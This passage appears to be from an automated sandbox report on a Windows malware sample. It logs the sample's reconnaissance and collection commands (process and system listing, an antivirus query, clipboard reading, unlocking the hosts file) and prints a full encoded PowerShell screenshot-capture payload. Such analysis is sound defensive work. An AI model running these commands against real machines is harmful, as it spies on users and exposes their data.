                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                                            Start time:10:18:05
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                                                            Imagebase:0x7ff6acf70000
                                                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                                            Imagebase:0x7ff748520000
                                                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                            Imagebase:0x7ff78c900000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                            Imagebase:0x7ff78c900000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                                                            Start time:10:18:07
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                            Imagebase:0x7ff78c900000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                                            Start time:10:18:09
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
